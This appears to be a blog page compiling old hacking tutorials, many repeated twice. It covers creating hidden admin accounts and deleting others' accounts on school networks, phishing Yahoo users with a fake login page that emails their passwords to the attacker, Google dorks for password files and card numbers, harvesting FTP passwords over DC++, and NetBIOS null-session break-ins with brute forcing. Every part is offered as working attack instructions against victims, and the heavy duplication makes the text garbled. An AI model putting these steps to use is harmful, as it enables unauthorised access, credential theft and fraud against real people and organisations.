FOR MULTILOGIN IN YAHOOMESSENGER
1.open notepad
2.paste these codes
REGEDIT4
[HKEY_CURRENT_USER\Software\yahoo\pager\Test]
"Plural"=dword:00000001
3.save it as multi.reg
4. either double click on this file or rt click on it and select merge option. (aim is to merge this settings into registry
Wednesday, January 23, 2008
hacing school
NOTICE: TO ALL CONCERNED Certain text files and messages contained on this site deal with activities and devices which would be in violation of various Federal, State, and local laws if actually carried out or constructed. The webmasters of this site do not advocate the breaking of any law. Our text files and message bases are for informational purposes only. We recommend that you contact your local law enforcement officials before undertaking any project based upon any information obtained from this or any other web site. We do not guarantee that any of the information contained on this system is correct, workable, or factual. We are not responsible for, nor do we assume any liability for, damages resulting from the use of any information on this site.
Hacking your school (Version 1.1) by Timmeh
Hacking at school
This tutorial is aimed at school servers running Windows underneath (most of them do). It works definitely with Windows 98, 2000, Me, and XP. never tried it with 95, but it should work anyway. However, schools can stop Batch files from working, but it is very uncommon for them to be that switched on.
There are problems with school servers, and they mostly come back to the basic architecture of the system - so the admins are unlikely to do anything about it! In this article I will discuss how to bypass web filtering software at school, send messages everywhere you want, create admin accounts, modify others' accounts, and generally cause havok. Please note that I ahve refrained from giving away information that will actually screw up your school server, though intelligent thinkers will work it out. THis is because, for god sakes, this is a school! Don't screw them up!
How to get it all moving
An MS-DOS prompt is the best way to do stuff, because most admins don't think its possible to get them and, if they do , they just can't do anything much about it.
First, open a notepad file (if your school blocks notepad, open a webpage, right click and go to view source. hey presto, notepad!). Now, write
command.com
and save the file as batch.bat, or anything with the extension .bat . Open this file and it will give you a command prompt (for more information on why this works, look to the end of the article). REMEMBER TO DELETE THIS FILE ONCE YOU'VE FINISHED!!! if the admins see it, they will kill you
Bypassing that pesky web filtering
Well, now you've got a command prompt, it's time to visit whatever site you want. Now, there are plenty of ways to bypass poorly constructed filtering, but I'm going to take it for granted that your school has stopped these. This one, as far as I know, will never be stopped.
in your command prompt, type
ping hackthissite.org
or anything else you wanna visit. Now you should have a load of info, including delay times and, most importantly, an IP address for the website. Simply type this IP address into the address bar, preceded by http://, and you'll be able to access the page!
For example: http://197.57.189.10 etc.
Now, I've noticed a lot of people have been saying that there are other ways to bypass web filtering, and there are. I am only mentioning the best method I know. Others you might want to try are:
1) Using a translator, like Altavista's Babel fish, to translate the page from japanese of something to english. This will bypass the filtering and won't translate the page, since it's already in English.
2) When you search up the site on Google, there will be a link saying 'Cache'. Click that and you should be on.
3) Use a proxy. I recommend Proxify.com. If your school has blocked it, search it up on Google and do the above. Then you can search to your heart's content
Sending messages out over the network
Okay, here's how to send crazy messages to everyone in your school on a computer. In your command prompt, type
Net Send * "The server is h4x0r3d"
*Note: may not be necessary, depending on how many your school has access too. If it's just one, you can leave it out*
Where is, replace it with the domain name of your school. For instance, when you log on to the network, you should have a choice of where to log on, either to your school, or to just the local machine. It tends to be called the same as your school, or something like it. So, at my school, I use
Net Send Varndean * "The server is h4x0r3d"
The asterisk denotes wildcard sending, or sending to every computer in the domain. You can swap this for people's accounts, for example
NetSend Varndean dan,jimmy,admin "The server is h4x0r3d"
use commas to divide the names and NO SPACES between them.
Adding/modifying user accounts
Now that you have a command prompt, you can add a new user (ie yourself) like so
C:>net user username /ADD
where username is the name of your new account. And remember, try and make it look inconspicuous, then they'll just think its a student who really is at school, when really, the person doesn't EXIST! IF you wanna have a password, use this instead:
C:>net user username password /ADD
where password is the password you want to have. So for instance the above would create an account called 'username', with the password being 'password'. The below would have a username of 'JohnSmith' and a password of 'fruity'
C:>net user JohnSmith fruity /ADD
Right then, now that we can create accounts, let's delete them
C:>net user JohnSmith /DELETE
This will delete poor liddle JohnSmith's account. Awww. Do it to you enemies:P no only joking becuase they could have important work... well okay only if you REALLY hate them
Let's give you admin priveleges
C:>net localgroup administrator JohnSmith /ADD
This will make JohnSmith an admin. Remember that some schools may not call their admins 'adminstrator' and so you need to find out the name of the local group they belong to.
You can list all the localgroups by typing
C:>net localgroup
Running .exe files you can't usually run
In the command prompt, use cd (change directory) to go to where the file is, use DIR to get the name of it, and put a shortcut of it on to a floppy. Run the program off the floppy disk.
Well, I hope this article helped a bit. Please vote for me if you liked it Also, please don't go round screwing up your school servers, they are providing them free to you to help your learning.
I will add more as I learn more and remember stuff (I think I've left some stuff out - this article could get very long...)
Hacking your school (Version 1.1) by Timmeh
Hacking at school
This tutorial is aimed at school servers running Windows underneath (most of them do). It works definitely with Windows 98, 2000, Me, and XP. never tried it with 95, but it should work anyway. However, schools can stop Batch files from working, but it is very uncommon for them to be that switched on.
There are problems with school servers, and they mostly come back to the basic architecture of the system - so the admins are unlikely to do anything about it! In this article I will discuss how to bypass web filtering software at school, send messages everywhere you want, create admin accounts, modify others' accounts, and generally cause havok. Please note that I ahve refrained from giving away information that will actually screw up your school server, though intelligent thinkers will work it out. THis is because, for god sakes, this is a school! Don't screw them up!
How to get it all moving
An MS-DOS prompt is the best way to do stuff, because most admins don't think its possible to get them and, if they do , they just can't do anything much about it.
First, open a notepad file (if your school blocks notepad, open a webpage, right click and go to view source. hey presto, notepad!). Now, write
command.com
and save the file as batch.bat, or anything with the extension .bat . Open this file and it will give you a command prompt (for more information on why this works, look to the end of the article). REMEMBER TO DELETE THIS FILE ONCE YOU'VE FINISHED!!! if the admins see it, they will kill you
Bypassing that pesky web filtering
Well, now you've got a command prompt, it's time to visit whatever site you want. Now, there are plenty of ways to bypass poorly constructed filtering, but I'm going to take it for granted that your school has stopped these. This one, as far as I know, will never be stopped.
in your command prompt, type
ping hackthissite.org
or anything else you wanna visit. Now you should have a load of info, including delay times and, most importantly, an IP address for the website. Simply type this IP address into the address bar, preceded by http://, and you'll be able to access the page!
For example: http://197.57.189.10 etc.
Now, I've noticed a lot of people have been saying that there are other ways to bypass web filtering, and there are. I am only mentioning the best method I know. Others you might want to try are:
1) Using a translator, like Altavista's Babel fish, to translate the page from japanese of something to english. This will bypass the filtering and won't translate the page, since it's already in English.
2) When you search up the site on Google, there will be a link saying 'Cache'. Click that and you should be on.
3) Use a proxy. I recommend Proxify.com. If your school has blocked it, search it up on Google and do the above. Then you can search to your heart's content
Sending messages out over the network
Okay, here's how to send crazy messages to everyone in your school on a computer. In your command prompt, type
Net Send * "The server is h4x0r3d"
*Note: may not be necessary, depending on how many your school has access too. If it's just one, you can leave it out*
Where is, replace it with the domain name of your school. For instance, when you log on to the network, you should have a choice of where to log on, either to your school, or to just the local machine. It tends to be called the same as your school, or something like it. So, at my school, I use
Net Send Varndean * "The server is h4x0r3d"
The asterisk denotes wildcard sending, or sending to every computer in the domain. You can swap this for people's accounts, for example
NetSend Varndean dan,jimmy,admin "The server is h4x0r3d"
use commas to divide the names and NO SPACES between them.
Adding/modifying user accounts
Now that you have a command prompt, you can add a new user (ie yourself) like so
C:>net user username /ADD
where username is the name of your new account. And remember, try and make it look inconspicuous, then they'll just think its a student who really is at school, when really, the person doesn't EXIST! IF you wanna have a password, use this instead:
C:>net user username password /ADD
where password is the password you want to have. So for instance the above would create an account called 'username', with the password being 'password'. The below would have a username of 'JohnSmith' and a password of 'fruity'
C:>net user JohnSmith fruity /ADD
Right then, now that we can create accounts, let's delete them
C:>net user JohnSmith /DELETE
This will delete poor liddle JohnSmith's account. Awww. Do it to you enemies:P no only joking becuase they could have important work... well okay only if you REALLY hate them
Let's give you admin priveleges
C:>net localgroup administrator JohnSmith /ADD
This will make JohnSmith an admin. Remember that some schools may not call their admins 'adminstrator' and so you need to find out the name of the local group they belong to.
You can list all the localgroups by typing
C:>net localgroup
Running .exe files you can't usually run
In the command prompt, use cd (change directory) to go to where the file is, use DIR to get the name of it, and put a shortcut of it on to a floppy. Run the program off the floppy disk.
Well, I hope this article helped a bit. Please vote for me if you liked it Also, please don't go round screwing up your school servers, they are providing them free to you to help your learning.
I will add more as I learn more and remember stuff (I think I've left some stuff out - this article could get very long...)
Fake yahoo email login.
U can make a fake url login page, email ur victim to visit ur fake login page / or just email ur fake login page (see yahoo email tips) and when he/she types the username and pass, the info 'll be send to u ex. by a cgi script. Cgi scripts can be found on the net. Although u can get here one.
NOTE: If u r going to email ur fake login page, on the pass file (of the form), check its properties and change it to normal (if not, when the user tries to type his/her password within the yahoo email account, will be prompted not to type it). Yahoo recognizes pass fields and prompt users about it. Yahoo also recognizes info send anywhere else than yahoo and prompt the user.
NOTE: U can also use cgi scripts from ur own site (must support cgi).
We are providing a working example of a fake login page, with an external cgi script, which 'll email u the username and the password. Just download the zip file HERE and follow the below instructions.
1. Open the ready.htm file, Edit (file menu top left) -> Select all and press CTRL+C.
2. Open ur email client or account (must support html ex. yahoo email), compose a new email and press CTRL+V in the text field.
3. Send it to ur victim(s).
The ready.htm file 'll proceed the info to am20forces@yahoo.com. So just change it to ur email address (open ready.htm with ex. notepad, search for am20forces@yahoo.com text and change it). Also with the same way change the title (not the name of ready.htm, the title within the html codes) to something like "Yahoo email restore".
NOTE: The fake login page its a quick build page, but the job its done perfectly. Just remember to change the info as mention above and that the received email 'll contain username and "email address" (which "email address" its the password).
Instead of the page, u can send a link to the fake login page. U can obscure the link (read in "Tutorials" -> "Obscure url") or just fake the displayed text of the link using ex. Microsoft Word (click the example to see) ex. http://www.mail.yahoo.com/restore.asp?id=3587496 or combined the methods.
NOTE: Use a fake email address (u can use a fake email sender app ex. similar to "ELBOMB" in "Others" download section) ex. YAHOO_ADMIN@yahoo_bot.com with description to be "ACCOUNT ERROR". Lots of ppl receives such emails, claiming that they must relogin to activate their account due to an error etc.
In the zip file, u can also find a cgi submission script, which u can edit/modify as u like and upload it on ur site. Its preferable to create ur own (if u 've the knowledge) cgi script, or just modify one (and not using a cgi sciprt provider).
tm file on ur site (using web service provider ex. geocities), remember to upload all the files included (images etc.) in the "ready" folder.
NOTE: If u r going to email ur fake login page, on the pass file (of the form), check its properties and change it to normal (if not, when the user tries to type his/her password within the yahoo email account, will be prompted not to type it). Yahoo recognizes pass fields and prompt users about it. Yahoo also recognizes info send anywhere else than yahoo and prompt the user.
NOTE: U can also use cgi scripts from ur own site (must support cgi).
We are providing a working example of a fake login page, with an external cgi script, which 'll email u the username and the password. Just download the zip file HERE and follow the below instructions.
1. Open the ready.htm file, Edit (file menu top left) -> Select all and press CTRL+C.
2. Open ur email client or account (must support html ex. yahoo email), compose a new email and press CTRL+V in the text field.
3. Send it to ur victim(s).
The ready.htm file 'll proceed the info to am20forces@yahoo.com. So just change it to ur email address (open ready.htm with ex. notepad, search for am20forces@yahoo.com text and change it). Also with the same way change the title (not the name of ready.htm, the title within the html codes) to something like "Yahoo email restore".
NOTE: The fake login page its a quick build page, but the job its done perfectly. Just remember to change the info as mention above and that the received email 'll contain username and "email address" (which "email address" its the password).
Instead of the page, u can send a link to the fake login page. U can obscure the link (read in "Tutorials" -> "Obscure url") or just fake the displayed text of the link using ex. Microsoft Word (click the example to see) ex. http://www.mail.yahoo.com/restore.asp?id=3587496 or combined the methods.
NOTE: Use a fake email address (u can use a fake email sender app ex. similar to "ELBOMB" in "Others" download section) ex. YAHOO_ADMIN@yahoo_bot.com with description to be "ACCOUNT ERROR". Lots of ppl receives such emails, claiming that they must relogin to activate their account due to an error etc.
In the zip file, u can also find a cgi submission script, which u can edit/modify as u like and upload it on ur site. Its preferable to create ur own (if u 've the knowledge) cgi script, or just modify one (and not using a cgi sciprt provider).
tm file on ur site (using web service provider ex. geocities), remember to upload all the files included (images etc.) in the "ready" folder.
Google Hacking
These methods will be easily understood by the Hackers
Any help for the Novice Hackers Please drop in your Comments : Rahul
u can also drop in ur E - Mail Id's to be mailed a detailed Presentation on Google HACKING
Using Google, and some finely crafted searches we can find a lot of interesting information.
For Example we can find:
Credit Card Numbers
Passwords
Software / MP3's
...... (and on and on and on) Presented below is just a sample of interesting searches that we can send to google to obtain info that some people might not want us having.. After you get a taste using some of these, try your own crafted searches to find info that you would be interested in.
Try a few of these searches:
intitle:"Index of" passwords modified
allinurl:auth_user_file.txt
"access denied for user" "using password"
"A syntax error has occurred" filetype:ihtml
allinurl: admin mdb
"ORA-00921: unexpected end of SQL command"
inurl:passlist.txt
"Index of /backup"
"Chatologica MetaSearch" "stack tracking:"
Amex Numbers: 300000000000000..399999999999999
MC Numbers: 5178000000000000..5178999999999999
visa 4356000000000000..4356999999999999
"parent directory " /appz/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory "Xvid -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory "MP3-xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " Name of Singer or album -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
Notice that I am only changing the word after the parent directory, change it to what you want and you will get a lot of stuff.
METHOD 2
put this string in google search:
?intitle:index.of? mp3
You only need add the name of the song/artist/singer.
Example: ?intitle:index.of? mp3 jackson
METHOD 3
put this string in google search:
inurl:microsoft filetype:iso
You can change the string to watever you want, ex. microsoft to adobe, iso to zip etc…
"# -FrontPage-" inurl:service.pwd
Frontpage passwords.. very nice clean search results listing !!
"AutoCreate=TRUE password=*"
This searches the password for "Website Access Analyzer"
, a Japanese software that creates webstatistics. For those who can read Japanese, check out the author's site at: http://www.coara.or.jp/~passy/
"http://*:*@www" domainname
This is a query to get inline passwords from search engines (not just Google), you must type in the query followed with the the domain name without the .com or .net
"http://*:*@www" bangbus or "http://*:*@www"bangbus
Another way is by just typing
"http://bob:bob@www"
"sets mode: +k"
This search reveals channel keys (passwords) on IRC as revealed from IRC chat logs.
allinurl: admin mdb
Not all of these pages are administrator's access databases containing usernames, passwords and other sensitive information, but many are!
allinurl:auth_user_file.txt
DCForum's password file. This file gives a list of (crackable) passwords, usernames and email addresses for DCForum and for DCShop (a shopping cart program(!!!). Some lists are bigger than others, all are fun, and all belong to googledorks. =)
intitle:"Index of" config.php
This search brings up sites with "config.php" files. To skip the technical discussion, this configuration file contains both a username and a password for an SQL database. Most sites with forums run a PHP message base. This file gives you the keys to that forum, including FULL ADMIN access to the database.
eggdrop filetype:user user
These are eggdrop config files. Avoiding a full-blown descussion about eggdrops and IRC bots, suffice it to say that this file contains usernames and passwords for IRC users.
intitle:index.of.etc
This search gets you access to the etc directory, where many many many types of password files can be found. This link is not as reliable, but crawling etc directories can be really fun!
filetype:bak inurl:"htaccess|passwd|shadow|htusers"
This will search for backup files (*.bak) created by some editors or even by the administrator himself (before activating a new version).
Every attacker knows that changing the extenstion of a file on a webserver can have ugly consequences.
Let's pretend you need a serial number for windows xp pro.
In the google search bar type in just like this - "Windows XP Professional" 94FBR
the key is the 94FBR code.. it was included with many MS Office registration codes so this will help you dramatically reduce the amount of 'fake' porn sites that trick you.
or if you want to
find the serial for winzip 8.1 - "Winzip 8.1"
Any help for the Novice Hackers Please drop in your Comments : Rahul
u can also drop in ur E - Mail Id's to be mailed a detailed Presentation on Google HACKING
Using Google, and some finely crafted searches we can find a lot of interesting information.
For Example we can find:
Credit Card Numbers
Passwords
Software / MP3's
...... (and on and on and on) Presented below is just a sample of interesting searches that we can send to google to obtain info that some people might not want us having.. After you get a taste using some of these, try your own crafted searches to find info that you would be interested in.
Try a few of these searches:
intitle:"Index of" passwords modified
allinurl:auth_user_file.txt
"access denied for user" "using password"
"A syntax error has occurred" filetype:ihtml
allinurl: admin mdb
"ORA-00921: unexpected end of SQL command"
inurl:passlist.txt
"Index of /backup"
"Chatologica MetaSearch" "stack tracking:"
Amex Numbers: 300000000000000..399999999999999
MC Numbers: 5178000000000000..5178999999999999
visa 4356000000000000..4356999999999999
"parent directory " /appz/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory "Xvid -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory "MP3-xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " Name of Singer or album -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
Notice that I am only changing the word after the parent directory, change it to what you want and you will get a lot of stuff.
METHOD 2
put this string in google search:
?intitle:index.of? mp3
You only need add the name of the song/artist/singer.
Example: ?intitle:index.of? mp3 jackson
METHOD 3
put this string in google search:
inurl:microsoft filetype:iso
You can change the string to watever you want, ex. microsoft to adobe, iso to zip etc…
"# -FrontPage-" inurl:service.pwd
Frontpage passwords.. very nice clean search results listing !!
"AutoCreate=TRUE password=*"
This searches the password for "Website Access Analyzer"
, a Japanese software that creates webstatistics. For those who can read Japanese, check out the author's site at: http://www.coara.or.jp/~passy/
"http://*:*@www" domainname
This is a query to get inline passwords from search engines (not just Google), you must type in the query followed with the the domain name without the .com or .net
"http://*:*@www" bangbus or "http://*:*@www"bangbus
Another way is by just typing
"http://bob:bob@www"
"sets mode: +k"
This search reveals channel keys (passwords) on IRC as revealed from IRC chat logs.
allinurl: admin mdb
Not all of these pages are administrator's access databases containing usernames, passwords and other sensitive information, but many are!
allinurl:auth_user_file.txt
DCForum's password file. This file gives a list of (crackable) passwords, usernames and email addresses for DCForum and for DCShop (a shopping cart program(!!!). Some lists are bigger than others, all are fun, and all belong to googledorks. =)
intitle:"Index of" config.php
This search brings up sites with "config.php" files. To skip the technical discussion, this configuration file contains both a username and a password for an SQL database. Most sites with forums run a PHP message base. This file gives you the keys to that forum, including FULL ADMIN access to the database.
eggdrop filetype:user user
These are eggdrop config files. Avoiding a full-blown descussion about eggdrops and IRC bots, suffice it to say that this file contains usernames and passwords for IRC users.
intitle:index.of.etc
This search gets you access to the etc directory, where many many many types of password files can be found. This link is not as reliable, but crawling etc directories can be really fun!
filetype:bak inurl:"htaccess|passwd|shadow|htusers"
This will search for backup files (*.bak) created by some editors or even by the administrator himself (before activating a new version).
Every attacker knows that changing the extenstion of a file on a webserver can have ugly consequences.
Let's pretend you need a serial number for windows xp pro.
In the google search bar type in just like this - "Windows XP Professional" 94FBR
the key is the 94FBR code.. it was included with many MS Office registration codes so this will help you dramatically reduce the amount of 'fake' porn sites that trick you.
or if you want to
find the serial for winzip 8.1 - "Winzip 8.1"
hack ftp site via google
You all know or should know that there is SEVERAL ways to do something, they all might be right.I'm going to show you the most simple but most rewarding also (in my opinion) way to get access to ftps.
You start with downloading DC++ from google. For all of you who doesn't know what DC++ is then it is a p2p software to share files.It's not like Kazaa or something so you just don't search, you have to enter "hubs" (it's like rooms kind of) and search for the files in there.Every hub got their own rules, for example you must share atleast 10GB to enter it or something. But there are also hubs with none share limit so you can enter them right away, but they aren't really the best.I would reccomend to get maybe 50GB share or something because then you can enter MOSt of the hubs. The better hubs you enter the higher is the chance that you will find password.
Right when you've downloaded DC++ and made all the configurations then enter a good hub (one with alot of people).Now to the harvesting password part. To get hold of password you need to get some dat files. For example some ftp clients store their passwords in files.One of the most popular clients is Flash FXP, that client stores the password in the sites.dat file.So what you do is to search for the sites.dat file in DC++ and then make sure that you uncheck the option "Only find user with free slots" since the file you are going to download only take around 3 kb or something. Then you are able to download it even if your target doesn't have any free slots.Right after you've downloaded around 5 of them go to google and search for Flash FXP password decrypter.Then just open the sites.dat file with notepad and decrypt the passwords. Tada! You can now enter the ftp, unless they changed it of course.
Another way is to search for another clients password file. One called WS FTP32.Hmm now when I think about it I don't really remember butI think the
file was called wsftp.ini .You could use an online decrypter to decrypt those passwords... you could just google it or go to:
h77p://www.hispasec.com/directorio/laboratorio/Software/ws_ftp.html
You start with downloading DC++ from google. For all of you who doesn't know what DC++ is then it is a p2p software to share files.It's not like Kazaa or something so you just don't search, you have to enter "hubs" (it's like rooms kind of) and search for the files in there.Every hub got their own rules, for example you must share atleast 10GB to enter it or something. But there are also hubs with none share limit so you can enter them right away, but they aren't really the best.I would reccomend to get maybe 50GB share or something because then you can enter MOSt of the hubs. The better hubs you enter the higher is the chance that you will find password.
Right when you've downloaded DC++ and made all the configurations then enter a good hub (one with alot of people).Now to the harvesting password part. To get hold of password you need to get some dat files. For example some ftp clients store their passwords in files.One of the most popular clients is Flash FXP, that client stores the password in the sites.dat file.So what you do is to search for the sites.dat file in DC++ and then make sure that you uncheck the option "Only find user with free slots" since the file you are going to download only take around 3 kb or something. Then you are able to download it even if your target doesn't have any free slots.Right after you've downloaded around 5 of them go to google and search for Flash FXP password decrypter.Then just open the sites.dat file with notepad and decrypt the passwords. Tada! You can now enter the ftp, unless they changed it of course.
Another way is to search for another clients password file. One called WS FTP32.Hmm now when I think about it I don't really remember butI think the
file was called wsftp.ini .You could use an online decrypter to decrypt those passwords... you could just google it or go to:
h77p://www.hispasec.com/directorio/laboratorio/Software/ws_ftp.html
hacking using netbios
hack using netbios
Introduction.
Netbios stands for Network Basic Input Output System and is probably the easiest way to hack a system remotely. It was originally developed by IBM and Sytek as an Application Programming Interface (API) for client software to access LAN resources. Like any other service, works on a port (in this case on port 139).
NOTE: U can use any port scanner to find a system running netbios, by scanning for port 139. A specific scanner for netbios is "XSharez" which u can find it in our "scanners" download section.
Nbtstat command.
We can manually interact with netbios, by using the command prompt and nbtstat comand. Just go to Start-> Run -> and type in "command" or "cmd" . Ur MS-DOS window 'll open. Now type in nbtstat/? and u 'll get somthing like:
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\>nbtstat/?
Displays protocol statistics and current TCP/IP connections using NBT
(NetBIOS over TCP/IP).
NBTSTAT [ [-a RemoteName] [-A IP address] [-c] [-n]
[-r] [-R] [-RR] [-s] [-S] [interval] ]
-a (adapter status) Lists the remote machine's name table given its name
-A (Adapter status) Lists the remote machine's name table given its
IP address.
-c (cache) Lists NBT's cache of remote [machine] names and their IP
addresses
-n (names) Lists local NetBIOS names.
-r (resolved) Lists names resolved by broadcast and via WINS
-R (Reload) Purges and reloads the remote cache name table
-S (Sessions) Lists sessions table with the destination IP addresses
-s (sessions) Lists sessions table converting destination IP
addresses to computer NETBIOS names.
-RR (ReleaseRefresh) Sends Name Release packets to WINS and then, starts Refresh
RemoteName Remote host machine name.
IP address Dotted decimal representation of the IP address.
interval Redisplays selected statistics, pausing interval seconds
between each display. Press Ctrl+C to stop redisplaying
statistics.
NOTE: The main command that we are going to use is c:\>nbtstat -a ip ex. c:\>nbtstat -a 100.100.100.100
After we use the above command, we 'll get a somthing like:
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------------
user <00> UNIQUE Registered
workgroup <00> GROUP Registered
user <03> UNIQUE Registered
user <20> UNIQUE Registered
MAC Address = 00-02-48-18-29-E7
NOTE: The important think here (which actually tell us that the file and printer sharing is enabled on victim's system), is the <20>.
NOTE: If we dont get a <20>, then this means that file and printer sharing is not enabled on victims system and we must search for other victim.
Now we type in MS-DOS (which should be still opened) c:\>net view \\ip ex. c:\net view \\100.100.100.100
Share name Type Used as Comment
-------------------------------------------------------------------------
CDISK Disk
HP-6L Print
OK, now we can see that our victim is sharing a disk named as CDISK and printer sharing with name HP-6L.
NOTE: If we are able to share the victims hard disks or folders or printers we will be able to read write to the folders or hard disks or we may also be able to print anything on a remote printer.
Normal connection.
Just type in MS-DOS c:\>net use k: \\100.100.100.100\CDISK
NOTE: Letter k can be anything u like. It 'll appear in ur "my computer" and u'll be able to control ur victim's system (like copy-paste-delete, read-write etc.)
If u get a confirmation as "Command was completed succesfully", then just go to "my computer" and open the k:\ driver (which 'll be ur victim's driver on ur PC) and do anything u like.
Connection with Null Session.
For null session, we must use c:\>net use \\100.100.100.100\IPC$ "" /u .
NOTE: If we get Command completed succesfully, then we are connected anonymously. If we got an error like ex. System error 51 occured or Host not found, then the victim has set on the RestrictAnonymous to avoid anonymous connections.
Collection of informations
• CIS or ENUM
• NAT (Netbios Auditing Tool)
NOTE: Those tools are in our "Scanners" Download section. Go get them. We are going to use them to collect info from victim.
ENUM (works from command prompt):
usage: enum [switches] [hostname|ip]
-U get userlist
-M get machine list
-N get namelist dump (different from -U|-M)
-S get sharelist
-P get password policy information
-G get group and member list
-L get LSA policy information
-D dictionary crack, needs -u and -f
-d be detailed, applies to -U and -S
-c don't cancel sessions
-u specify username to use (default "")
-p specify password to use (default "")
-f specify dictfile to use (wants -D)
If we type (in ENUM command prompt) enum -U -S -G 100.100.100.100 , ENUM 'll try to connect to victim with a null session (doesnt matter if we already did) and we 'll get some info about victim. See below for example.
server: 100.100.100.100
setting up session... success.
getting user list (pass 1, index 0)... success, got 7.
Administrator Guest AM2o Cynos Sisqo printer
enumerating shares (pass 1)... got 6 shares, 0 left:
IPC$ print$ C ADMIN$ C$ CanonCLC320
Group: Administrators
AM2o\Administrator
Group: Backup Operators
Group: Guests
AM2o\Guest
Group: Power Users
AM2o\AM2o
AM2o\Cynos
AM2o\Sisqo
Group: *******
Group: Users
NT AUTHORITY\INTERACTIVE
NT AUTHORITY\Authenticated Users
AM2o\printer
Group: Debugger Users
NT AUTHORITY\SYSTEM
cleaning up... success.
NOTE: We can see from here the system name: AM2o, users: Administrator, Guest, Cynos, Sisqo, places sharing: IPC$ print$ C ADMIN$ C$ CanonCLC320, power users: AM2o, Cynos, Sisqo. You can use and the other commands to select more info if u like.
CIS (Cerberus Information Security):
Just set a host (without http://) or an ip (ex. 100.100.100.100), then go to "File" -> Select module and set "netbios checks". This 'll automatically select information. When completed, press view report. The advantage about CIS, is that when it finds a user, automatically try to find the password too (i'll explain later about passwords) if exists.
NOTE: The symbol $, indicates the hided places ex. $ADMIN is the %systemroot% (for windows NT and 2000 C:\winnt for XP C:\windows etc.). Those places are protected with passwords. So, try to avoid those places (for now). ex. if sharing places are IPC$ print$ C ADMIN$ C$ CanonCLC320, then use net use \\100.100.100.100\C .
NAT (Netbios Auditing Tool):
This is a very good tool which 'll try to find the sharing places and get through the passes. It uses userlist and passlist that we define, so collect as many info as u can with ENUM and/or CIS.
Usage: nat -o results.txt -u userlist.txt -p passlist.txt 100.100.100.100
NOTE: If password finally founded, we use net use k: \\ip\place * /u:user ex. net use k: \\100.100.100.100\C * /u:Cynos and when we asked for pass, just type it and u are connected. U 'll get "Command completed succesfully".
NOTE: Another one good tool like NAT, is PQwak2, which u can get it here.
Disable File Printer sharing.
• Click the Start Menu and choose Settings, Control Panel.
• Double-click the Network icon.
• Click the Configuration tab.
• Click the File and Print Sharing button. The File and Print Sharing dialog box will appear.
• Make sure that the following two boxes are NOT checked
"I want to be able to give others access to my files"
"I want to be able to allow others to print from my printers"
• Click the OK button in the File and Print Sharing dialog box.
• Click the OK button in the Network control panel.
A prompt box will appear requesting you to restart your computer.
(If no changes were made, this box may not appear.)
• Restart your computer for your new setting to take effect .
Introduction.
Netbios stands for Network Basic Input Output System and is probably the easiest way to hack a system remotely. It was originally developed by IBM and Sytek as an Application Programming Interface (API) for client software to access LAN resources. Like any other service, works on a port (in this case on port 139).
NOTE: U can use any port scanner to find a system running netbios, by scanning for port 139. A specific scanner for netbios is "XSharez" which u can find it in our "scanners" download section.
Nbtstat command.
We can manually interact with netbios, by using the command prompt and nbtstat comand. Just go to Start-> Run -> and type in "command" or "cmd" . Ur MS-DOS window 'll open. Now type in nbtstat/? and u 'll get somthing like:
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\>nbtstat/?
Displays protocol statistics and current TCP/IP connections using NBT
(NetBIOS over TCP/IP).
NBTSTAT [ [-a RemoteName] [-A IP address] [-c] [-n]
[-r] [-R] [-RR] [-s] [-S] [interval] ]
-a (adapter status) Lists the remote machine's name table given its name
-A (Adapter status) Lists the remote machine's name table given its
IP address.
-c (cache) Lists NBT's cache of remote [machine] names and their IP
addresses
-n (names) Lists local NetBIOS names.
-r (resolved) Lists names resolved by broadcast and via WINS
-R (Reload) Purges and reloads the remote cache name table
-S (Sessions) Lists sessions table with the destination IP addresses
-s (sessions) Lists sessions table converting destination IP
addresses to computer NETBIOS names.
-RR (ReleaseRefresh) Sends Name Release packets to WINS and then, starts Refresh
RemoteName Remote host machine name.
IP address Dotted decimal representation of the IP address.
interval Redisplays selected statistics, pausing interval seconds
between each display. Press Ctrl+C to stop redisplaying
statistics.
NOTE: The main command that we are going to use is c:\>nbtstat -a ip ex. c:\>nbtstat -a 100.100.100.100
After we use the above command, we 'll get a somthing like:
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------------
user <00> UNIQUE Registered
workgroup <00> GROUP Registered
user <03> UNIQUE Registered
user <20> UNIQUE Registered
MAC Address = 00-02-48-18-29-E7
NOTE: The important think here (which actually tell us that the file and printer sharing is enabled on victim's system), is the <20>.
NOTE: If we dont get a <20>, then this means that file and printer sharing is not enabled on victims system and we must search for other victim.
Now we type in MS-DOS (which should be still opened) c:\>net view \\ip ex. c:\net view \\100.100.100.100
Share name Type Used as Comment
-------------------------------------------------------------------------
CDISK Disk
HP-6L Print
OK, now we can see that our victim is sharing a disk named as CDISK and printer sharing with name HP-6L.
NOTE: If we are able to share the victims hard disks or folders or printers we will be able to read write to the folders or hard disks or we may also be able to print anything on a remote printer.
Normal connection.
Just type in MS-DOS c:\>net use k: \\100.100.100.100\CDISK
NOTE: Letter k can be anything u like. It 'll appear in ur "my computer" and u'll be able to control ur victim's system (like copy-paste-delete, read-write etc.)
If u get a confirmation as "Command was completed succesfully", then just go to "my computer" and open the k:\ driver (which 'll be ur victim's driver on ur PC) and do anything u like.
Connection with Null Session.
For null session, we must use c:\>net use \\100.100.100.100\IPC$ "" /u .
NOTE: If we get Command completed succesfully, then we are connected anonymously. If we got an error like ex. System error 51 occured or Host not found, then the victim has set on the RestrictAnonymous to avoid anonymous connections.
Collection of informations
• CIS or ENUM
• NAT (Netbios Auditing Tool)
NOTE: Those tools are in our "Scanners" Download section. Go get them. We are going to use them to collect info from victim.
